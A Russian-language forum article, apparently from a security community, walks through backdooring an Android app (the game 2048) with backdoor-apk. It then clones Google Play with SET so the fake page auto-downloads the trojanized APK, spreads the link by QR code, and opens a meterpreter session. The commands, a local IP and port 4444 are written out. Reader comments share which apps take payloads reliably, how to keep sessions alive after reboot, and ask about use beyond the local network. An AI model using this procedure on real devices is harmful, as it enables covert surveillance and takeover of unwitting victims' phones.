Статья Взлом Android - устройства. (Backdoor-apk + HTA server)

Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.

upload_2016-12-5_13-26-37.png

Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:

> git clone https://github.com/dana-at-cp/backdoor-apk.git

upload_2016-12-5_13-27-3.png

Затем установим все необходимые библиотеки.

> apt-get install lib32stdc++6 lib32ncurses5 lib32z1

upload_2016-12-5_13-27-30.png

Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.

Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.

Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.

Качаем именно эту версию, так как другие я просто не пробовал:

upload_2016-12-5_13-29-42.png

Сохраняем файл:

upload_2016-12-5_13-30-4.png

Затем скопируем файл в папку с установленным Backdoor-apk.

upload_2016-12-5_13-30-20.png

Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:

> cd backdoor-apk

> cd backdoor-apk

> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)

upload_2016-12-5_13-30-55.png

Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.

upload_2016-12-5_13-31-17.png

Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist

upload_2016-12-5_13-31-53.png

upload_2016-12-5_13-31-59.png

На этом пока остановимся.

Пришло время запустить SET - Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:

> setoolkit

Выбираем:

upload_2016-12-5_13-32-59.png

Выберем Website Attack Vectors.

upload_2016-12-5_13-33-17.png

Нас интересует HTA – Attack Method.

upload_2016-12-5_13-33-53.png

Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.

> https://play.google.com/store

upload_2016-12-5_13-38-50.png

Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.

upload_2016-12-5_13-39-52.png

Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:

· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)

· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

upload_2016-12-5_13-40-34.png

Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.

upload_2016-12-5_13-41-38.png

Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.

Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.

upload_2016-12-5_13-42-7.png

На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:

upload_2016-12-5_13-42-29.png

Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.

upload_2016-12-5_13-42-51.png

Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.

Установим игру.

upload_2016-12-5_13-43-11.png

Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:

> msfconsole –r backdoor-apk.rc

upload_2016-12-5_13-43-39.png

И затем, запустим игру.

upload_2016-12-5_13-44-4.png

В консоли получаем активную сессию meterpreter.

upload_2016-12-5_13-44-20.png

На этом все, спасибо за внимание.

Игрушка 2048, работала исправно. так же полагаю будильники должны работать.

У меня сработал калькулятор инженерный и File Manager. 2048 собралась, но связь рушилась - и были недоступны часть функций. ZIP архиватор через раз срабатывал. Тестил на Андре 4.2, 4.4, 5.х. Почти 80% либо "краш" на сборке, либо нет полноценной работы. Очень трудно найти. Причем, не важно чем отрабатывать FatRat, apk-backdoor, spada - если приложение не подходит, то не подходит.
При верном подходе и хорошем стечении обстоятельств тема весьма рабочая.

У меня сработал калькулятор инженерный и File Manager. 2048 собралась, но связь рушилась - и были недоступны часть функций. ZIP архиватор через раз срабатывал. Тестил на Андре 4.2, 4.4, 5.х. Почти 80% либо "краш" на сборке, либо нет полноценной работы. Очень трудно найти. Причем, не важно чем отрабатывать FatRat, apk-backdoor, spada - если приложение не подходит, то не подходит.
При верном подходе и хорошем стечении обстоятельств тема весьма рабочая.
И при маниакальной усидчивости и терпении)

• Нравится
Реакции: kot-gor и ghostphisher
Как-то можно сделать так, что бы сессия оставалась активная?

Тут в большой степени от приложения зависит, нужно пробовать с различными

например с часами, будильниками, прогнозом погоды, новостями - у них есть функция загрузки вместе с системой.

• Нравится
Реакции: Vander
Статья конечно класс! А то, что битая кодировка плея никто не заметил?

Можно ли будет скомпилить так, чтобы работало не в локале?

[*] Recompiling original project with backdoor...done.
date: неверная дата «Sun Jul 28 09:03:47 2041»
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK

Просмотрел дату даже в биосе - у меня все нормально. Я с этой прогой наверно промучился дня 3, и всегда она выдает ошибки. Кто лечил подобные вещи? И чем они лечатся? буду премного благодарен

Recompiling original project with backdoor...done.
date: неверная дата «Sun Jul 28 09:03:47 2041»
Generating RSA key for signing...done.
Signing recompiled APK...done.
Verifying signed artifacts...done.
Aligning recompiled APK...done.
[!] Failed to align recompiled APK

Просмотрел дату даже в биосе - у меня все нормально. Я с этой прогой наверно промучился дня 3, и всегда она выдает ошибки. Кто лечил подобные вещи? И чем они лечатся? буду премного благодарен
Что это за прога?

Проблема в том, что у тебя не компилируется окончательное приложение, верно?
Да, порой разные ошибки, полагаю проблема в том, что сертификат создается на странное время. А так - да, не собирается приложение в конце

А теперь, для самых тупых (меня), расскажите, как его после установки юзать?

Такой вопрос,а если .apk файл будет установлен не на одно устройство,а скажем на два?Можно ли получать сессию ,как то переключаясь между ними?

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!